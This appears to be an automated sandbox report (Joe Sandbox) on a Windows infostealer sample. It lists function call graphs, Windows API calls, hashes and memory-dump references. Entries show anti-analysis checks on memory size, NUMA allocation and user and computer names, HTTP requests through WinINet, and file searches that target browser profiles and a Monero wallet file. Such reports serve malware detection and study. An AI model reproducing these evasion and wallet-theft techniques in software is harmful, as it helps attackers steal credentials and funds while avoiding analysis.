                  control_flow_graph 1436 b01220-b01247 call b189b0 GlobalMemoryStatusEx 1439 b01273-b0127a 1436->1439 1440 b01249-b01271 call b1da00 * 2 1436->1440 1441 b01281-b01285 1439->1441 1440->1441 1443 b01287 1441->1443 1444 b0129a-b0129d 1441->1444 1447 b01292-b01294 ExitProcess 1443->1447 1448 b01289-b01290 1443->1448 1448->1444 1448->1447
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00B0123E
                  • __aulldiv.LIBCMT ref: 00B01258
                  • __aulldiv.LIBCMT ref: 00B01266
                  • ExitProcess.KERNEL32 ref: 00B01294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: 527a7fd67586e2beea23ec072c93f1f871e24524e94b119414a34a8274fcebca
                  • Instruction ID: dc1e4d4b1b67fc7c6d8632edf6274eb0f08e8b659019204e18008ffa87f7b704
                  • Opcode Fuzzy Hash: 527a7fd67586e2beea23ec072c93f1f871e24524e94b119414a34a8274fcebca
                  • Instruction Fuzzy Hash: CB01FFB0984308BBEB14DFD8CC49B9DBBB8AB14705F608484E705B62C0DA7455458B99
                  Function 00B16AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1450 b16af3 1451 b16b0a 1450->1451 1453 b16aba-b16ad7 call b1aad0 OpenEventA 1451->1453 1454 b16b0c-b16b22 call b16920 call b15b10 CloseHandle ExitProcess 1451->1454 1459 b16af5-b16b04 CloseHandle Sleep 1453->1459 1460 b16ad9-b16af1 call b1aad0 CreateEventA 1453->1460 1459->1451 1460->1454
                  APIs
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011F8910,?,00B2110C,?,00000000,?,00B21110,?,00000000,00B20AEF), ref: 00B16ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B16AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00B16AF9
                  • Sleep.KERNEL32(00001770), ref: 00B16B04
                  • CloseHandle.KERNEL32(?,00000000,?,011F8910,?,00B2110C,?,00000000,?,00B21110,?,00000000,00B20AEF), ref: 00B16B1A
                  • ExitProcess.KERNEL32 ref: 00B16B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                  • String ID:
                  • API String ID: 941982115-0
                  • Opcode ID: 9e8e9289770113ca69d6fd4f4597a6d3d7a89411353a6ec93307012f7e781c43
                  • Instruction ID: 4b0a36404c9b855efe8ec9b9da2798c88726cc01c76dd2cfe6db640e4598589e
                  • Opcode Fuzzy Hash: 9e8e9289770113ca69d6fd4f4597a6d3d7a89411353a6ec93307012f7e781c43
                  • Instruction Fuzzy Hash: 36F05E34A84309EBE710AFA0DC86BFE7BB4EF04741F904594F502E12C1CBB06580D6A6
                  Function 00B047B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04839
                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04849
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: 9a3c547c66e9471d936972894a9f6459327980a3876ef78ea50a218482e522fc
                  • Instruction ID: 4c1a5515b8dd9f7fc2465078eaaf816421fb1a7f3d6f6c583957c017c390035f
                  • Opcode Fuzzy Hash: 9a3c547c66e9471d936972894a9f6459327980a3876ef78ea50a218482e522fc
                  • Instruction Fuzzy Hash: 47215EB1D01209ABDF14DFA4EC45ADE7B74FF05320F008625F915A72D1EB706A09CB91
                  Function 00B151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B06280: InternetOpenA.WININET(00B20DFE,00000001,00000000,00000000,00000000), ref: 00B062E1
                    • Part of subcall function 00B06280: StrCmpCA.SHLWAPI(?,011FE3D0), ref: 00B06303
                    • Part of subcall function 00B06280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B06335
                    • Part of subcall function 00B06280: HttpOpenRequestA.WININET(00000000,GET,?,011FDD60,00000000,00000000,00400100,00000000), ref: 00B06385
                    • Part of subcall function 00B06280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B063BF
                    • Part of subcall function 00B06280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B063D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00B15228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 43594235e0e5beab317d6aa785167c543929aea8bb2c6427bece5835fa07774a
                  • Instruction ID: c80297d5ebc907aa9d6e9d3512a9a65e67b9b61bd0b7d88b2dfc336ac984f934
                  • Opcode Fuzzy Hash: 43594235e0e5beab317d6aa785167c543929aea8bb2c6427bece5835fa07774a
                  • Instruction Fuzzy Hash: C5112E30911108ABCB14FF64DD92AED77B8AF50310FC04598F80A5A192EF30BB86C691
                  Function 00B01110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B0112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00B01132
                  • ExitProcess.KERNEL32 ref: 00B01143
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: 8c5f3cc4038c6b2858448f6c2308d8ea72410d9d516294c2107ecd1ceeb34959
                  • Instruction ID: 7896279bbe5cf29ed0f8a6e322e405433d33d1c6d83cb5f85515e3a526d6bef1
                  • Opcode Fuzzy Hash: 8c5f3cc4038c6b2858448f6c2308d8ea72410d9d516294c2107ecd1ceeb34959
                  • Instruction Fuzzy Hash: 0DE08674985308FBE7146FA89C0AB097AB8EB05B01F100084F708B62C0D6B4260096A9
                  Function 00B010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                  Download Yara Rule
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00B010B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00B010F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 165106bf85ca35ccc84f075e0afa3d3a6a0538cd3a6084009029bfbf55b1af31
                  • Instruction ID: 389bbd7e55fcd064bcc10f5d776f7eba6f60f63aacf5c7e019f3d92c8b65e0d1
                  • Opcode Fuzzy Hash: 165106bf85ca35ccc84f075e0afa3d3a6a0538cd3a6084009029bfbf55b1af31
                  • Instruction Fuzzy Hash: 0BF0E271681308BBE7149BA8AC49FAAB7E8E705B55F301888F544E3280D5719E40CAA0
                  Function 00B01190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B17910
                    • Part of subcall function 00B178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00B17917
                    • Part of subcall function 00B178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00B1792F
                    • Part of subcall function 00B17850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B011B7), ref: 00B17880
                    • Part of subcall function 00B17850: RtlAllocateHeap.NTDLL(00000000), ref: 00B17887
                    • Part of subcall function 00B17850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B1789F
                  • ExitProcess.KERNEL32 ref: 00B011C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: 8ed6045266b034db104691042f3dcaef82cd2bb587e498b1972816507b60bbb9
                  • Instruction ID: 2238cdca4883a8a0330275a2a9f449f3d12fbaec18ef2aaba660f3d988218508
                  • Opcode Fuzzy Hash: 8ed6045266b034db104691042f3dcaef82cd2bb587e498b1972816507b60bbb9
                  • Instruction Fuzzy Hash: 06E012B999430153DA1477BAAC0AB6A37DCAB15385F4408A4FA09E3242FE25E94185B6

                  Non-executed Functions

                  Function 00B138B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00B138CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 00B138E3
                  • lstrcat.KERNEL32(?,?), ref: 00B13935
                  • StrCmpCA.SHLWAPI(?,00B20F70), ref: 00B13947
                  • StrCmpCA.SHLWAPI(?,00B20F74), ref: 00B1395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B13C67
                  • FindClose.KERNEL32(000000FF), ref: 00B13C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: dbfad9a40f60d4e4b59b1d5c9a95617d1858f2a4420447abfa4645f5190cfddd
                  • Instruction ID: 3b311364b5ccf8dd57665d2b0fdd6f975557f0ab62df6135b5e57e1fc33f9fe3
                  • Opcode Fuzzy Hash: dbfad9a40f60d4e4b59b1d5c9a95617d1858f2a4420447abfa4645f5190cfddd
                  • Instruction Fuzzy Hash: E3A14EB5A403189BDB24DFA4DC85FEE73B8FB59700F4445C8A60D96181EB749B84CFA2
                  Function 00B0BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00B20B32,00B20B2B,00000000,?,?,?,00B213F4,00B20B2A), ref: 00B0BEF5
                  • StrCmpCA.SHLWAPI(?,00B213F8), ref: 00B0BF4D
                  • StrCmpCA.SHLWAPI(?,00B213FC), ref: 00B0BF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0C7BF
                  • FindClose.KERNEL32(000000FF), ref: 00B0C7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: eab8c929180800f2f9c609489ed62f41e374744ec145d82fdbbe679f37c120d8
                  • Instruction ID: 0ffe39039df1ce4056b2d9c0a2b249405019a6c78ce1775cb57ddd3fa2aa5525
                  • Opcode Fuzzy Hash: eab8c929180800f2f9c609489ed62f41e374744ec145d82fdbbe679f37c120d8
                  • Instruction Fuzzy Hash: CD4262729111049BCB14FB64DD96EED77BCAF54310F8045D8B50AA61D1EF30AF89CBA2
                  Function 00B14910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00B1492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00B14943
                  • StrCmpCA.SHLWAPI(?,00B20FDC), ref: 00B14971
                  • StrCmpCA.SHLWAPI(?,00B20FE0), ref: 00B14987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B14B7D
                  • FindClose.KERNEL32(000000FF), ref: 00B14B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
